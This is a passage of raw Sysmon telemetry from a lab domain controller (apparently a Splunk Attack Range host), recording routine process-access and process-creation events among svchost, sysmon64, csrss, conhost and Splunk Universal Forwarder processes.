10341000x80000000000000009255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-472B-6000-FB04-000000009A01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-472B-6000-FB04-000000009A01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.904{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-472B-6000-FB04-000000009A01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.905{08A6967A-472B-6000-FB04-000000009A01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009242Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-472B-6000-FA04-000000009A01}4840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009241Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-472B-6000-FA04-000000009A01}4840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-472B-6000-FA04-000000009A01}4840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:15.233{08A6967A-472B-6000-FA04-000000009A01}4840C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009269Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:16.576{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-472C-6000-FC04-000000009A01}228C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009268Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 